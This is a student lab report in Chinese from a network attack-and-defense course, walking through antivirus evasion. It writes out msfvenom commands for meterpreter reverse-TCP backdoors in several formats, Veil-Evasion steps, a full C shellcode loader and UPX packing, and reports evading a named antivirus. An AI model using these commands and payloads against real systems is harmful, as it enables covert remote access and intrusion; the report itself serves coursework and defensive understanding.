zoukankan      html  css  js  c++  java
  • 2019-2020-2《网络对抗技术》Exp3 免杀原理与实践

    2019-2020-2《网络对抗技术》Exp3 免杀原理与实践

    一、实践目标

    • 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧
    • 通过组合应用各种技术实现恶意代码免杀
    • 用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本

    二、基础知识

    • 免杀原理:
    • 免杀技术全称为反杀毒技术Anti Anti- Virus简称“免杀”,它指的是一种能使病毒木马免于被杀毒软件查杀的技术。由于免杀技术的涉猎面非常广,其中包含反汇编、逆向工程、系统漏洞等黑客技术,所以难度很高。其内容基本上都是修改病毒、木马的内容改变特征码,从而躲避了杀毒软件的查杀。
    • 如果要做好免杀,就要清楚杀毒软件(恶意软件检测工具)是如何工作的。AV(Anti-virus)是很大一个产业。

    三、实验内容

    1.正确使用免杀工具或技巧

    1.1正确使用msf编码器

    实验二中已经生成的后门程序放到VirusTotal中查看结果:

    由此可见不加任何处理的后门程序能够被大多数杀软检测到,接下来用msf编码器对后门程序进行一次到多次的编码,并进行检测。

    在kali中输入:

    	msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b 'x00' LHOST=192.168.1.20 LPORT=5321 -f exe > exp3.exe
    

    生成一次编码的后门程序的检测结果:

    生成十次编码的后门程序:

    	msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b 'x00' LHOST=192.168.1.20 LPORT=5321 -f exe > encoded10.exe
    

    由此可见多次编码还是有一定的效果的,经过多次编码处理后的后门程序被检测出的概率下降了一点点,但是大多数杀软还是可以将其检测出来。

    1.2msfvenom生成如jar之类的其他文件

    生成jar文件:

    	msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.20 LPORT=5321 x> 20175321jar.jar
    

    生成jsp文件:

    	msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.20 LPORT=5321 x> 20175321jsp.jsp
    

    生成php文件:

    	msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.20 LPORT=5321 x> 20175321php.php
    

    生成apk文件:

    	msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.20 LPORT=5321 x> 20175321apk.apk
    

    1.3使用veil-evasion生成后门程序

    使用sudo apt-get install veil进行veil的安装:

    安装完成后输入veil命令:

    输入use evasion,显示如下:

    之后输入命令use c/meterpreter/rev_tcp.py进入配置界面:

    使用set LHOST 192.168.1.20设置反弹连接IP地址
    使用set LPORT 5321设置端口

    使用generate命令生成文件,接着输入生成的playload的名称veil20175321,保存路径为/var/lib/veil/output/source/veil20175321.exe

    到virustotal中看看veil生成的隐蔽性如何:

    效果还是不怎么好啊。

    1.4使用C+shellcode编程生成后门程序

    使用如下指令生成shellcode:

    	msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.20 LPORT=5321 -f c
    

    创建20175321.c,将buf添加到代码中

    	unsigned char buf[] = 
    	"xfcxe8x82x00x00x00x60x89xe5x31xc0x64x8bx50x30"
    	"x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26x31xff"
    	"xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2xf2x52"
    	"x57x8bx52x10x8bx4ax3cx8bx4cx11x78xe3x48x01xd1"
    	"x51x8bx59x20x01xd3x8bx49x18xe3x3ax49x8bx34x8b"
    	"x01xd6x31xffxacxc1xcfx0dx01xc7x38xe0x75xf6x03"
    	"x7dxf8x3bx7dx24x75xe4x58x8bx58x24x01xd3x66x8b"
    	"x0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44x24"
    	"x24x5bx5bx61x59x5ax51xffxe0x5fx5fx5ax8bx12xeb"
    	"x8dx5dx68x33x32x00x00x68x77x73x32x5fx54x68x4c"
    	"x77x26x07x89xe8xffxd0xb8x90x01x00x00x29xc4x54"
    	"x50x68x29x80x6bx00xffxd5x6ax0ax68xc0xa8x7ax88"
    	"x68x02x00x14xc5x89xe6x50x50x50x50x40x50x40x50"
    	"x68xeax0fxdfxe0xffxd5x97x6ax10x56x57x68x99xa5"
    	"x74x61xffxd5x85xc0x74x0axffx4ex08x75xecxe8x67"
    	"x00x00x00x6ax00x6ax04x56x57x68x02xd9xc8x5fxff"
    	"xd5x83xf8x00x7ex36x8bx36x6ax40x68x00x10x00x00"
    	"x56x6ax00x68x58xa4x53xe5xffxd5x93x53x6ax00x56"
    	"x53x57x68x02xd9xc8x5fxffxd5x83xf8x00x7dx28x58"
    	"x68x00x40x00x00x6ax00x50x68x0bx2fx0fx30xffxd5"
    	"x57x68x75x6ex4dx61xffxd5x5ex5exffx0cx24x0fx85"
    	"x70xffxffxffxe9x9bxffxffxffx01xc3x29xc6x75xc1"
    	"xc3xbbxf0xb5xa2x56x6ax00x53xffxd5";
    	int main() 
    	{ 
    	    int (*func)() = (int(*)())buf; 
    	    func(); 
    	}
    

    使用i686-w64-mingw32-g++ 20175321.c -o 20175321.exe生成exe可执行文件

    在virustotal中查看效果:

    大多数杀软还是能发现的。

    1.5加壳工具

    使用命令upx 20175321.exe -o 20175321pro.exe对20175321.exe加壳

    上传到virustotal中:

    加壳以后能够检测出的杀软少了几个,但是大部分的杀软还是可以检测出来的。

    1.6其他方法

    采用Veil-Evasion的其他荷载生成后门方式
    进入evasion,使用list查看可用的有效荷载:

    我选择的是第32个荷载,是Python下shellcode在DES下加密一种

    输入option查看有效荷载的选项

    修改用户名后使用generate生成,选择shellcode平台时选择2:msfvenom,payloads与IP、端口号使用tab自动获取

    输入生成文件的文件名,选择Py2Exe生成exe文件

    之后,生成的rc文件放入了路径/var/lib/veil/output/handlers/中,可执行文件放入了/var/lib/veil/output/source/ 中
    将可执行文件上传到virustotal中看看效果:

    2.通过组合应用各种技术实现恶意代码免杀

    • 使用上一个部分采用Veil-Evasion生成的Python下shellcode在DES下加密文件已经可以通过杀软检查,所以这步中我使用了Python下shellcode使用DES加密的载荷+加密壳生成的文件:

    3.用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本

    电脑环境:win10主机
    杀毒引擎:联想电脑管家
    杀软版本:2.8.100.3131
    木马库版本时间:2020-04-01 17:59:23

    四、实验总结与体会

    1.基础问题回答

    • (1)杀软是如何检测出恶意代码的?

      • 通过检测代码中的特征码或者某些特征片段,将其于自己的特征码库进行比对,如代码中检测出特征码或者某些特征片段,就将其判定为恶意代码。(长得像鸭子)

      • 启发式恶意软件检测:就是如果一个软件在干通常是恶意软件干的事,看起来了像个恶意软件,它就被当做了恶意软件。(叫声像鸭子)

      • 基于行为的恶意软件检测:相当于是启发式的一种,或者是加入了行为监控的启发式。(走路像鸭子)

    • (2)免杀是做什么?

      • 通过对恶意代码加壳或者进行编码等操作,隐藏代码中的特征码或者某些特征片段,起到瞒天过海的作用,使得杀软不容易检测出该恶意代码。
    • (3)免杀的基本方法有哪些?

      • 改变特征码:使用encoder进行编码、重新编译生成可执行文件、加壳等手段改变特征码

      • 改变行为:使用反弹式连接、隧道技术与加密通讯的数据。同时加入正常功能代码、尽量减少对系统的修改。

    2.实践总结与体会

    在本次实验过程中,我使用了几种不同的方法进行免杀尝试,其中有的比较靠谱,有的不咋地。通过本次实验,我进一步理解了免杀原理,同时对杀毒软件的可靠性有了新的认识。但是杀毒软件不是神,也不是万能的,很多其他方面的防护还需要我们提高警惕,不访问不安全的网站,下载软件从官网下载,不下载来路不明的软件,这样才能减少我们在平时的学习和生活中使用的计算机遇到恶意代码的概率。

    3.开启杀软能绝对防止电脑中恶意代码吗?

    不能,通过本次实验已经能看出杀软不能检测出所有的恶意软件,杀软的病毒库中如果没有记录该特征片段,或着没有检测该恶意代码的有效手段则无法检测到该恶意代码,就不能及时杀掉电脑中的恶意代码。

  • 相关阅读:
    多态性的理解
    类(三)——继承与多态
    类(二)——拷贝控制(浅拷贝,深拷贝,浅赋值,深赋值)
    类 (一) ——基本概念
    STL容器底层数据结构的实现
    异常处理
    C++实现单例模式
    类的成员函数的连续调用与返回值问题
    拷贝构造函数的参数为什么必须使用引用类型?拷贝赋值运算符的参数为什么也是引用类型?
    U盘装机教程
  • 原文地址:https://www.cnblogs.com/Brass/p/12630186.html
Copyright © 2011-2022 走看看